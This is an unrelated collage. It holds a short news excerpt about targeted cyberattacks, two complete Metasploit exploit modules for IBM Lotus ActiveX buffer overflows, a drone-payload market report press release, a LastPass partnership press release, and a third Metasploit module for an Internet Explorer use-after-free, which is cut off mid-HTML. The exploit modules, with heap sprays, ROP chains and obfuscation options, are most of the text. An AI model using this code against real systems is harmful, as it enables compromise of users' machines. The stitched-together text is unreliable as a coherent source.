PUNE: Targeted attacks on IT systems, which proved successful in disrupting service and fraudulently obtaining significant amounts of intellectual property in 2012, will further intensify in the coming year. These strikes are difficult to protect against, because attackers destroy evidence of the attack immediately, IT security solutions experts have said.

Threats to Android, Cloud and digital lifestyle devices will make fighting cybercriminals in 2013 more complex than ever before, the experts said.

Jagdish Mahapatra, managing director (India & SAARC) for cyber security firm McAfee, said, "We are likely to see significantly more targeted attacks and targeted malware in 2013. This type of attack is difficult to guard against. Uniform attacks are still out there, but as soon as they are identified and a security fix is released they are no longer effective. One disturbing development in 2012 was that we started to see more targeted attacks that also destroyed evidence of the attack afterwards and the trend is likely to continue."

Mahapatra said dealing with clean-up operations distracts IT administrators, who don't immediately realise they have been hacked. "It also adds to the difficulty in ensuring effective incident response as hackers literally attack any hardware on the way out. Protecting against this will be a major challenge, particularly for enterprises and government," he said.

read more.............http://timesofindia.indiatimes.com/city/pune/Fighting-cyber-crime-a-challenge-say-experts/articleshow/17825932.cms

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking

include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::RopDb
include Msf::Exploit::Remote::BrowserAutopwn

autopwn_info({
:ua_name    => HttpClients::IE,
:ua_minver  => "6.0",
:ua_maxver  => "9.0",
:javascript => true,
:os_name    => OperatingSystems::WINDOWS,
:rank       => Rank,
:classid    => "{0F2AAAE3-7E9E-4b64-AB5D-1CA24C6ACB9C}",
:method     => "Attachment_Times"
})


def initialize(info={})
super(update_info(info,
'Name'           => "IBM Lotus iNotes dwa85W ActiveX Buffer Overflow",
'Description'    => %q{
This module exploits a buffer overflow vulnerability on the UploadControl
ActiveX. The vulnerability exists in the handling of the "Attachment_Times"
property, due to the insecure usage of the _swscanf. The affected ActiveX is
provided by the dwa85W.dll installed with the IBM Lotus iNotes ActiveX installer.

This module has been tested successfully on IE6-IE9 on Windows XP, Vista and 7,
using the dwa85W.dll 85.3.3.0 as installed with Lotus Domino 8.5.3.

In order to bypass ASLR the no aslr compatible module dwabho.dll is used. This one
is installed with the iNotes ActiveX.
},
'License'        => MSF_LICENSE,
'Author'         =>
[
'Gaurav Baruah', # Vulnerability discovery
'juan vazquez' # Metasploit module
],
'References'     =>
[
[ 'CVE', '2012-2175'],
[ 'OSVDB', '82755' ],
[ 'BID', '53879' ],
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-132/' ],
[ 'URL', 'http://www-304.ibm.com/support/docview.wss?uid=swg21596862' ]
],
'Payload'        =>
{
'Space' => 978,
'DisableNops' => true,
'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
},
'DefaultOptions'  =>
{
'InitialAutoRunScript' => 'migrate -f'
},
'Platform'       => 'win',
'Targets'        =>
[
# dwa85W.dll 85.3.3.0
[ 'Automatic', {} ],
[ 'IE 6 on Windows XP SP3', { 'Rop' => nil,     'Offset' => '0x5F4', 'Ret' => 0x0c0c0c0c } ],
[ 'IE 7 on Windows XP SP3', { 'Rop' => nil,     'Offset' => '0x5F4', 'Ret' => 0x0c0c0c0c } ],
[ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt, 'Offset' => '0x5f4', 'Ret' => 0x77C34FBF } ], # pop esp # ret # msvcrt.dll
[ 'IE 7 on Windows Vista',  { 'Rop' => nil,     'Offset' => '0x5f4', 'Ret' => 0x0c0c0c0c } ],
[ 'IE 8 on Windows Vista',  { 'Rop' => :notes,  'Offset' => '0x5f4', 'Ret' => 0x1000f765 } ], # pop eax # ret # dwabho.dll
[ 'IE 8 on Windows 7',      { 'Rop' => :notes,  'Offset' => '0x5f4', 'Ret' => 0x1000f765 } ], # pop eax # ret # dwabho.dll
[ 'IE 9 on Windows 7',      { 'Rop' => :notes,  'Offset' => '0x5fe', 'Ret' => 0x1000f765 } ]  # pop eax # ret # dwabho.dll
],
'Privileged'     => false,
'DisclosureDate' => "Jun 01 2012",
'DefaultTarget'  => 0))

register_options(
[
OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
], self.class)

end

def get_target(agent)
#If the user is already specified by the user, we'll just use that
return target if target.name != 'Automatic'

nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
ie = agent.scan(/MSIE (\d)/).flatten[0] || ''

ie_name = "IE #{ie}"

case nt
when '5.1'
os_name = 'Windows XP SP3'
when '6.0'
os_name = 'Windows Vista'
when '6.1'
os_name = 'Windows 7'
end

targets.each do |t|
if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))
print_status("Target selected as: #{t.name}")
return t
end
end

return nil
end

def ie_heap_spray(my_target, p)
js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))
js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch))
js_random_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch))

# Land the payload at 0x0c0c0c0c
case my_target
when targets[7]
# IE 9 on Windows 7
js = %Q|
function randomblock(blocksize)
{
var theblock = "";
for (var i = 0; i < blocksize; i++)
{
theblock += Math.floor(Math.random()*90)+10;
}
return theblock;
}

function tounescape(block)
{
var blocklen = block.length;
var unescapestr = "";
for (var i = 0; i < blocklen-1; i=i+4)
{
unescapestr += "%u" + block.substring(i,i+4);
}
return unescapestr;
}

var heap_obj = new heapLib.ie(0x10000);
var code = unescape("#{js_code}");
var nops = unescape("#{js_random_nops}");
while (nops.length < 0x80000) nops += nops;
var offset_length = #{my_target['Offset']};
for (var i=0; i < 0x1000; i++) {
var padding = unescape(tounescape(randomblock(0x1000)));
while (padding.length < 0x1000) padding+= padding;
var junk_offset = padding.substring(0, offset_length);
var single_sprayblock = junk_offset + code + nops.substring(0, 0x800 - code.length - junk_offset.length);
while (single_sprayblock.length < 0x20000) single_sprayblock += single_sprayblock;
sprayblock = single_sprayblock.substring(0, (0x40000-6)/2);
heap_obj.alloc(sprayblock);
}
|

else
# For IE 6, 7, 8
js = %Q|
var heap_obj = new heapLib.ie(0x20000);
var code = unescape("#{js_code}");
var nops = unescape("#{js_nops}");
while (nops.length < 0x80000) nops += nops;
var offset = nops.substring(0, #{my_target['Offset']});
var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
while (shellcode.length < 0x40000) shellcode += shellcode;
var block = shellcode.substring(0, (0x80000-6)/2);
heap_obj.gc();
for (var i=1; i < 0x300; i++) {
heap_obj.alloc(block);
}
var overflow = nops.substring(0, 10);
|

end

js = heaplib(js, {:noobfu => true})

if datastore['OBFUSCATE']
js = ::Rex::Exploitation::JSObfu.new(js)
js.obfuscate
end

return js
end

def get_payload(t, cli)
code = payload.encoded

# No rop. Just return the payload.
return code if t['Rop'].nil?

# Both ROP chains generated by mona.py - See corelan.be
case t['Rop']
when :msvcrt
print_status("Using msvcrt ROP")
rop_payload = generate_rop_payload('msvcrt', code, {'target'=>'xp'})#{'pivot'=>stack_pivot, 'target'=>'xp'})
else
print_status("Using dwabho.dll ROP")
# gadgets from dwabho.dll, using mona.py
rop_payload = [
0x1000f765, # POP EAX # RETN
0x1001a22c, # ptr to &VirtualAlloc() [IAT dwabho.dll]
0x10010394, # JMP DWORD PTR DS:[EAX]
0x0c0c0c2c, # ret after VirtualAlloc
0x0c0c0c2c, # lpAddress
0x00000400, # dwSize
0x00001000, # flAllocationType
0x00000040 # flProtect
].pack("V*")
rop_payload << code
end

return rop_payload
end

def load_exploit_html(my_target, cli)
p  = get_payload(my_target, cli)
js = ie_heap_spray(my_target, p)

bof = rand_text_alpha(552) # offset to eip
bof << [my_target.ret].pack("V")

case my_target['Rop']
when :msvcrt
bof << rand_text_alpha(4)
bof << [0x0c0c0c0c].pack("V") # new ESP
when :notes
bof << rand_text_alpha(4)
bof << [0x0c0c0c00].pack("V") # eax
bof << [0x1000f49a].pack("V") # pop esp # dec ecx # add byte ptr ds:[eax],al # pop ecx # pop ecx # retn # dwabho.dll
bof << [0x0c0c0c04].pack("V") # new ESP
end

my_bof = Rex::Text.to_unescape(bof)

html = %Q|
<html>
<head>
<script>
#{js}
</script>
</head>
<body>
<object id="UploadControl" width="100%" height="100%" classid="clsid:0F2AAAE3-7E9E-4b64-AB5D-1CA24C6ACB9C">
<param name="General_Mode" value="1">
<param name="General_URL" value="http://#{rand_text_alpha(rand(10) + 5)}">
</object>
<script>
var bof = unescape("#{my_bof}");
var my_time = "#{rand_text_numeric(2)}/#{rand_text_numeric(2)}/#{rand_text_numeric(4)} #{rand_text_numeric(2)}:#{rand_text_numeric(2)}:#{rand_text_numeric(2)} ";
my_time += bof;
my_time += " GMT";
UploadControl.Attachment_Times = my_time;
</script>
</body>
</html>
|

return html
end

def on_request_uri(cli, request)
agent = request.headers['User-Agent']
uri   = request.uri
print_status("Requesting: #{uri}")

my_target = get_target(agent)
# Avoid the attack if no suitable target found
if my_target.nil?
print_error("Browser not supported, sending 404: #{agent}")
send_not_found(cli)
return
end

html = load_exploit_html(my_target, cli)
html = html.gsub(/^\t\t/, '')
print_status("Sending HTML...")
send_response(cli, html, {'Content-Type'=>'text/html'})
end

end


##Credit: Gaurav Baruah, juan vazquez

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking

include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::RopDb
include Msf::Exploit::Remote::BrowserAutopwn

autopwn_info({
:ua_name    => HttpClients::IE,
:ua_minver  => "6.0",
:ua_maxver  => "9.0",
:javascript => true,
:os_name    => OperatingSystems::WINDOWS,
:rank       => Rank,
:classid    => "{05D96F71-87C6-11D3-9BE4-00902742D6E0}",
:method     => "Attachment_Times"
})


def initialize(info={})
super(update_info(info,
'Name'           => "IBM Lotus QuickR qp2 ActiveX Buffer Overflow",
'Description'    => %q{
This module exploits a buffer overflow vulnerability on the UploadControl
ActiveX. The vulnerability exists in the handling of the "Attachment_Times"
property, due to the insecure usage of the _swscanf. The affected ActiveX is
provided by the qp2.dll installed with the IBM Lotus Quickr product.

This module has been tested successfully on IE6-IE9 on Windows XP, Vista and 7,
using the qp2.dll 8.1.0.1800. In order to bypass ASLR the no aslr compatible module
msvcr71.dll is used. This one is installed with the qp2 ActiveX.
},
'License'        => MSF_LICENSE,
'Author'         =>
[
'Gaurav Baruah', # Vulnerability discovery
'juan vazquez' # Metasploit module
],
'References'     =>
[
[ 'CVE', '2012-2176' ],
[ 'OSVDB', '82166' ],
[ 'BID', '53678'],
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-134/' ],
[ 'URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg21596191' ]
],
'Payload'        =>
{
'Space' => 978,
'DisableNops' => true,
'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
},
'DefaultOptions'  =>
{
'InitialAutoRunScript' => 'migrate -f'
},
'Platform'       => 'win',
'Targets'        =>
[
# qp2.dll 8.1.0.1800
[ 'Automatic', {} ],
[ 'IE 6 on Windows XP SP3', { 'Rop' => nil,  'Offset' => '0x5F4', 'Ret' => 0x0c0c0c0c } ],
[ 'IE 7 on Windows XP SP3', { 'Rop' => nil,  'Offset' => '0x5F4', 'Ret' => 0x0c0c0c0c } ],
[ 'IE 8 on Windows XP SP3', { 'Rop' => :jre, 'Offset' => '0x5f4', 'Ret' => 0x7C346B52 } ], # pop esp # ret # msvcr71.dll
[ 'IE 7 on Windows Vista',  { 'Rop' => nil,  'Offset' => '0x5f4', 'Ret' => 0x0c0c0c0c } ],
[ 'IE 8 on Windows Vista',  { 'Rop' => :jre, 'Offset' => '0x5f4', 'Ret' => 0x7C346B52 } ], # pop esp # ret # msvcr71.dll
[ 'IE 8 on Windows 7',      { 'Rop' => :jre, 'Offset' => '0x5f4', 'Ret' => 0x7C346B52 } ], # pop esp # ret # msvcr71.dll
[ 'IE 9 on Windows 7',      { 'Rop' => :jre, 'Offset' => '0x5fe', 'Ret' => 0x7C346B52 } ]  # pop esp # ret # msvcr71.dll
],
'Privileged'     => false,
'DisclosureDate' => "May 23 2012",
'DefaultTarget'  => 0))

register_options(
[
OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
], self.class)

end

def get_target(agent)
#If the user is already specified by the user, we'll just use that
return target if target.name != 'Automatic'

nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
ie = agent.scan(/MSIE (\d)/).flatten[0] || ''

ie_name = "IE #{ie}"

case nt
when '5.1'
os_name = 'Windows XP SP3'
when '6.0'
os_name = 'Windows Vista'
when '6.1'
os_name = 'Windows 7'
end

targets.each do |t|
if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))
print_status("Target selected as: #{t.name}")
return t
end
end

return nil
end

def ie_heap_spray(my_target, p)
js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))
js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch))
js_random_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch))

# Land the payload at 0x0c0c0c0c
case my_target
when targets[7]
# IE 9 on Windows 7
js = %Q|
function randomblock(blocksize)
{
var theblock = "";
for (var i = 0; i < blocksize; i++)
{
theblock += Math.floor(Math.random()*90)+10;
}
return theblock;
}

function tounescape(block)
{
var blocklen = block.length;
var unescapestr = "";
for (var i = 0; i < blocklen-1; i=i+4)
{
unescapestr += "%u" + block.substring(i,i+4);
}
return unescapestr;
}

var heap_obj = new heapLib.ie(0x10000);
var code = unescape("#{js_code}");
var nops = unescape("#{js_random_nops}");
while (nops.length < 0x80000) nops += nops;
var offset_length = #{my_target['Offset']};
for (var i=0; i < 0x1000; i++) {
var padding = unescape(tounescape(randomblock(0x1000)));
while (padding.length < 0x1000) padding+= padding;
var junk_offset = padding.substring(0, offset_length);
var single_sprayblock = junk_offset + code + nops.substring(0, 0x800 - code.length - junk_offset.length);
while (single_sprayblock.length < 0x20000) single_sprayblock += single_sprayblock;
sprayblock = single_sprayblock.substring(0, (0x40000-6)/2);
heap_obj.alloc(sprayblock);
}
|

else
# For IE 6, 7, 8
js = %Q|
var heap_obj = new heapLib.ie(0x20000);
var code = unescape("#{js_code}");
var nops = unescape("#{js_nops}");
while (nops.length < 0x80000) nops += nops;
var offset = nops.substring(0, #{my_target['Offset']});
var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
while (shellcode.length < 0x40000) shellcode += shellcode;
var block = shellcode.substring(0, (0x80000-6)/2);
heap_obj.gc();
for (var i=1; i < 0x300; i++) {
heap_obj.alloc(block);
}
var overflow = nops.substring(0, 10);
|

end

js = heaplib(js, {:noobfu => true})

if datastore['OBFUSCATE']
js = ::Rex::Exploitation::JSObfu.new(js)
js.obfuscate
end

return js
end

def get_payload(t, cli)
code = payload.encoded

# No rop. Just return the payload.
return code if t['Rop'].nil?

# Both ROP chains generated by mona.py - See corelan.be
case t['Rop']
when :jre
print_status("Using JRE ROP")
rop_payload = generate_rop_payload('java', code)#, {'pivot'=>stack_pivot})
end

return rop_payload
end

def load_exploit_html(my_target, cli)
p  = get_payload(my_target, cli)
js = ie_heap_spray(my_target, p)

bof = rand_text_alpha(512) # offset to eip"
bof << [my_target.ret].pack("V")
if my_target['Rop']
bof << rand_text_alpha(4)
bof << [0x0c0c0c0c].pack("V") # new stack
end

my_bof = Rex::Text.to_unescape(bof)

html = %Q|
<html>
<head>
<script>
#{js}
</script>
</head>
<body>
<object id="UploadControl" width="100%" height="100%" classid="clsid:05D96F71-87C6-11D3-9BE4-00902742D6E0">
<param name="General_Mode" value="1">
<param name="General_URL" value="http://#{rand_text_alpha(rand(10) + 5)}">
</object>
<script>
var bof = unescape("#{my_bof}");
var my_time = "#{rand_text_numeric(2)}/#{rand_text_numeric(2)}/#{rand_text_numeric(4)} #{rand_text_numeric(2)}:#{rand_text_numeric(2)}:#{rand_text_numeric(2)} ";
my_time += bof;
my_time += " GMT";
UploadControl.Attachment_Times = my_time;
</script>
</body>
</html>
|

return html
end

def on_request_uri(cli, request)
agent = request.headers['User-Agent']
uri   = request.uri
print_status("Requesting: #{uri}")

my_target = get_target(agent)
# Avoid the attack if no suitable target found
if my_target.nil?
print_error("Browser not supported, sending 404: #{agent}")
send_not_found(cli)
return
end

html = load_exploit_html(my_target, cli)
html = html.gsub(/^\t\t/, '')
print_status("Sending HTML...")
send_response(cli, html, {'Content-Type'=>'text/html'})
end

end

##Credit: Gaurav Baruah, juan vazquez

“The Global UAV Payload Market 2012-2022” is the new market research report added to RnRMarketResearch.com store.

Dallas, Texas (PRWEB) December 31, 2012

This report is the result of SDI’s extensive market and company research covering the global UAV payload industry. It provides detailed analysis of both historic and forecast global industry values, factors influencing demand, the challenges faced by industry participants, analysis of the leading companies in the industry, and key news.
"The Global UAV Payload Market 2012-2022" offers the reader detailed analysis of the global UAV payload market over the next ten years, alongside potential market opportunities to enter the industry, using detailed market size forecasts.
What are the key drivers behind recent market changes?
The global UAV payload market is expected to value US$43.7 billion by the end of 2012, which is estimated to increase to US$68.6 billion by 2022, representing a CAGR of 4.6% during the forecast period. Market demand is anticipated to be driven by increased UAV procurement by several countries across the world and continuous requirement formulations in areas such as persistent surveillance, suppression/destruction of enemy air defense (SEAD/DEAD), communications relays and combat search and rescue (CSAR). Another major factor which is expected to drive the market over the forecast period is the increasing incorporation of UAVs in civilian applications such as Homeland Security, disaster management and border surveillance.
What makes this report unique and essential to read?
The Global UAV Payload Market 2012-2022” provides detailed analysis of the current industry size and growth expectations from 2012 to 2022, including highlights of key growth stimulators. It also benchmarks the industry against key global markets and provides detailed understanding of emerging opportunities in specific areas.
Key Features and Benefits
The report provides detailed analysis of the market for UAV payload during 2012-2022, including the factors that influence why countries are investing or cutting defense expenditure. It provides detailed expectations of growth rates and projected total expenditure.
Northrop Grumman, Rheinmetall, FLIR Systems, AeroVironment, BAE Systems, Elbit Systems, Denel Dynamics, L 3 WESCAM, Thales, Lockheed Martin, SAAB, General Atomics Aeronautical Systems, AAI Corporation, Israel Aerospace Industries.
A low number of countries, including the US, UK, and Israel, are currently using armed drones. The US used combat UAVs with munitions in numerous missions in Afghanistan to strike suspected terrorists and insurgents. The country has recently doubled its fleet of Reaper combat UAVs in Afghanistan. The UK also performs strike missions with its UAVs in Afghanistan. However, numerous countries are undertaking strategies to equip their fleets with combat UAVs in the future, which is expected to bolster the demand for weaponry payloads.
Key Market Issues
The Europe and North America account for an estimated 80% of global defense spending. These countries were, however, among the hardest hit by the global financial crisis. This has led to austerity measures being introduced by national governments, which in turn have resulted in reduced defense budgets and the cancellation and indefinite delay of various UAV and associated payload projects. All these factors have had a detrimental effect on the growth of the UAV payload industry.
The overall industry consists of approximately 36 companies dominated by a few large firms. The new entrants and smaller firms are encountered with substantially high barriers to secure a considerable share of the market. For example, in the UAV and payload industry of the US, a major share of more than half of the total market revenue is shared by the top four companies.
Key Highlights
With the expected growth in market demand and diversity in UAV applications, there is a growing requirement for the future UAV and payload design to combine multi mission, modular, open architecture features, capable of accomplishing diverse missions. In addition, with the drive towards austerity measures in defense budgets in developed countries, the UAVs are expected to be flexible enough for diverse operations than dedicated to a single mission.
In recent times, UAVs have attracted significant attention for use in both military and homeland security. As the best substitute to the otherwise used manned aircraft for surveillance and reconnaissance missions, UAVs are now attracting significant investment by several countries. Payloads are essential systems in the UAVs which are instrumental in carrying out various missions and the demand for UAV payloads is thus expected to increase proportionally with the UAVs.
Buy a copy of report @ http://www.rnrmarketresearch.com/contacts/purchase?rname=65289
Browse more reports on Defense Industry @ http://www.rnrmarketresearch.com/reports/public-sector/defense
About Us:
RnRMarketResearch.com (http://www.rnrmarketresearch.com/) is an online database of market research reports offers in-depth analysis of over 5000 market segments. The library has syndicated reports by leading market research publishers across the globe and also offer customized market resea

AOR Technology's Employee LastPass™ provides customized single sign-in to enable employees and family members to easily and securely access benefit portals from multiple sources.


Client Portal with Employee LastPass
Employee LastPass removes a major barrier to employee benefits sites, promoting easy and regular access. Simplifying the sign-in process is particularly useful to the growing number of people accessing their information from mobile phones - Jeff Hill, CEO
Austin, TX (PRWEB) December 31, 2012

AOR Technology, a leading designer of custom Human Resources and benefits portals, today announces that it has partnered with LastPass to provide employees with a secure, single password sign-on to access all of their Human Resources, benefits, and payroll information. Employee LastPass™, a password management tool, will be integrated into all AOR Technology portals completely free-of-charge, giving users a unique sign-in that allows them to access multiple sites from their Human Resources or benefits portal using any computer or mobile device. Employee LastPass™ removes the need to track or remember multiple passwords and provides a high level of security to protect confidential and sensitive employee information.
“Most know how frustrating it is when you've forgotten or fumbled around for your password or username, and the valuable time wasted in recovering it—often requiring a support call and a password reset,” says Jeff Hill, CEO, AOR Technology. “To get around this, many use the same username and password to access all their sites, which puts all your personal information at risk. Employee LastPass removes a major barrier to employee benefits sites, promoting easy and regular access. Simplifying the sign-in process is particularly useful to the growing number of people accessing their information from mobile phones. Thanks to our development partners at LastPass, we're able to make this available to customers completely free-of-charge, making our benefits portals and websites even more user-friendly—increasing their utilization and value to employers, providers, and benefits brokers.”
“Our goal is to ensure that personal data is safely locked away until an individual needs it,” says Joe Siegrist, CEO, LastPass. “Embedding Employee LastPass within AOR Technology portals provides employees with quick, seamless access to benefit resources without the hassle of remembering or locating passwords. It also offers them peace of mind when it comes to protecting personal information that may be housed on multiple web sites.”
Employee LastPass™ will be offered as a free add-on for all portals built and maintained by AOR Technology.
About AOR Technology
AOR Technology, Inc. custom designs Human Resources and benefits portals that simplify management, lower barriers to access, and promote effective communications. AOR Technology works with brokers and their employer groups to centralize benefits, payroll, and wellness resources on a single platform, which is accessible via a single sign-on feature, making critical information instantly available from any desktop, laptop, tablet, or mobile device with Internet connectivity. For more information, visit http://www.aortechnology.com.
About LastPass
The LastPass team believes your online experience can be easier, faster and safer. Collectively we lose more than 10,300 hours per year retrieving lost passwords, making new ones or talking to call center representatives about them. And it gets much worse if a password is stolen and misused. We go online to connect with people, explore, shop and learn. We certainly don't go online to fuss with passwords or risk our privacy, personal or financial information. Designed by web enthusiasts and skilled application developers, LastPass was created to make the online experience easier and safer for everyone. For more information, visit, https://lastpass.com/.
# # #
For editorial information, contact:
Jeff Hill
AOR Technology
817-897-0947

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::RopDb

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Microsoft Internet Explorer CDwnBindInfo Object Use-After-Free Vulnerability",
      'Description'    => %q{
          This module exploits a vulnerability found in Microsoft Internet Explorer. A
        use-after-free condition occurs when a CButton object is freed, but a reference
        is kept and used again during a page reload, an invalid memory that's controllable
        is used, and allows arbitrary code execution under the context of the user.

          Please note: This vulnerability has been exploited in the wild targeting
        mainly China/Taiwan/and US-based computers.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'eromang',
          'mahmud ab rahman',
          'juan vazquez',
          'sinn3r'  #Metasploit
        ],
      'References'     =>
        [
          [ 'CVE', '2012-4792' ],
          [ 'US-CERT-VU', '154201' ],
          [ 'BID', '57070' ],
          [ 'URL', 'http://blog.fireeye.com/research/2012/12/council-foreign-relations-water-hole-attack-details.html'],
          [ 'URL', 'http://eromang.zataz.com/2012/12/29/attack-and-ie-0day-informations-used-against-council-on-foreign-relations/'],
          [ 'URL', 'http://blog.vulnhunt.com/index.php/2012/12/29/new-ie-0day-coming-mshtmlcdwnbindinfo-object-use-after-free-vulnerability/' ],
          [ 'URL', 'http://technet.microsoft.com/en-us/security/advisory/2794220' ],
          [ 'URL', 'http://blogs.technet.com/b/srd/archive/2012/12/29/new-vulnerability-affecting-internet-explorer-8-users.aspx' ]
        ],
      'Payload'        =>
        {
          'Space'        => 980,
          'DisableNops' => true,
          'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
        },
      'DefaultOptions'  =>
        {
          'InitialAutoRunScript' => 'migrate -f'
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Automatic', {} ],
          [ 'IE 8 on Windows XP SP3',       { 'Rop' => :msvcrt, 'Offset' => '0x586' } ], # 0x0c0c0b30
          [ 'IE 8 on Windows Vista',        { 'Rop' => :jre,    'Offset' => '0x586' } ], # 0x0c0c0b30
          [ 'IE 8 on Windows Server 2003',  { 'Rop' => :msvcrt, 'Offset' => '0x586' } ], # 0x0c0c0b30
          [ 'IE 8 on Windows 7',            { 'Rop' => :jre,    'Offset' => '0x586' } ]  # 0x0c0c0b30
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Dec 27 2012",
      'DefaultTarget'  => 0))

    register_options(
      [
        OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
      ], self.class)

  end

  def get_target(agent)
    #If the user is already specified by the user, we'll just use that
    return target if target.name != 'Automatic'

    nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
    ie = agent.scan(/MSIE (\d)/).flatten[0] || ''

    ie_name = "IE #{ie}"

    case nt
    when '5.1'
      os_name = 'Windows XP SP3'
    when '5.2'
      os_name = 'Windows Server 2003'
    when '6.0'
      os_name = 'Windows Vista'
    when '6.1'
      os_name = 'Windows 7'
    else
      # OS not supported
      return nil
    end

    targets.each do |t|
      if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))
        print_status("Target selected as: #{t.name}")
        return t
      end
    end

    return nil
  end

  def ie_heap_spray(my_target, p)
    js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))
    js_nops = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4), Rex::Arch.endian(target.arch))

    # Land the payload at 0x0c0c0b30
    js = %Q|
    var heap_obj = new heapLib.ie(0x20000);
    var code = unescape("#{js_code}");
    var nops = unescape("#{js_nops}");
    while (nops.length < 0x80000) nops += nops;
    var offset = nops.substring(0, #{my_target['Offset']});
    var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
    while (shellcode.length < 0x40000) shellcode += shellcode;
    var block = shellcode.substring(0, (0x80000-6)/2);
    heap_obj.gc();
    for (var i=1; i < 0x300; i++) {
      heap_obj.alloc(block);
    }
    |

    js = heaplib(js, {:noobfu => true})

    if datastore['OBFUSCATE']
      js = ::Rex::Exploitation::JSObfu.new(js)
      js.obfuscate
    end

    return js
  end

  def get_payload(t, cli)
    code = payload.encoded

    # No rop. Just return the payload.
    return code if t['Rop'].nil?

=begin
Stack Pivoting to eax:
0:008> db eax
0c0c0b30  0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c  ................
0c0c0b40  0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c  ................
=end
    # Both ROP chains generated by mona.py - See corelan.be
    case t['Rop']
    when :msvcrt
      print_status("Using msvcrt ROP")
      if t.name =~ /Windows XP/
        stack_pivot = [0x77c15ed6].pack("V") * 54 # ret
        stack_pivot << [0x77c2362c].pack("V") # pop ebx, #ret
        stack_pivot << [0x77c15ed5].pack("V") # xchg eax,esp # ret # 0x0c0c0c0c
        rop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'xp'})
      else
        stack_pivot = [0x77bcba5f].pack("V") * 54 # ret
        stack_pivot << [0x77bb4158].pack("V") # pop ebx, #ret
        stack_pivot << [0x77bcba5e].pack("V") # xchg eax,esp # ret # 0x0c0c0c0c
        rop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'2003'})
      end
    else
      print_status("Using JRE ROP")
      stack_pivot = [0x7c348b06].pack("V") * 54 # ret
      stack_pivot << [0x7c341748].pack("V") # pop ebx, #ret
      stack_pivot << [0x7c348b05].pack("V") # xchg eax,esp # ret # 0x0c0c0c0c
      rop_payload = generate_rop_payload('java', code, {'pivot'=>stack_pivot})
    end

    return rop_payload
  end

  def load_exploit_html(my_target, cli)

    p  = get_payload(my_target, cli)
    js = ie_heap_spray(my_target, p)

    html = %Q|
    <!doctype html>
    <html>
    <head>
    <script>
    #{js}

    function exploit()
    {
      var e0 = null;
      var e1 = null;
      var e2 = null;
      var arrObject = new Array(3000);
      var elmObject = new Array(500);
      for (var i = 0; i < arrObject.length; i++)
      {
        arrObject[i] = document.createElement('div');
        arrObject[i].className = unescape("ababababababababababababababababababababa");
      }

      for (var i = 0; i < arrObject.length; i += 2)
      {
        arrObject[i].className = null;
      }

      CollectGarbage();

      for (var i = 0; i < elmObject.length; i ++)
      {
        elmObject[i] = document.createElement('button');
      }

      for (var i = 1; i < arrObject.length; i += 2)
      {
        arrObject[i].className = null;
      }

      CollectGarbage();

      try {
        e0 = document.getElementById("a");
        e1 = document.getElementById("b");
        e2 = document.createElement("q");
        e1.applyElement(e2);
        e1.appendChild(document.createElement('button'));
        e1.applyElement(e0);
        e2.outerText = "";
        e2.appendChild(document.createElement('body'));
      } catch(e) { }
      CollectGarbage();
      for(var i =0; i < 20; i++)
      {
        arrObject[i].className = unescape("ababababababababababababababababababababa");
      }
      var eip = window;
      var data = "#{Rex::Text.rand_text_alpha(41)}";
      eip.location = unescape("%u0b30%u0c0c" + data);

    }

    </script>
    </head>
    <body onload="eval(exploit())">
    <form id="a">
    </form>
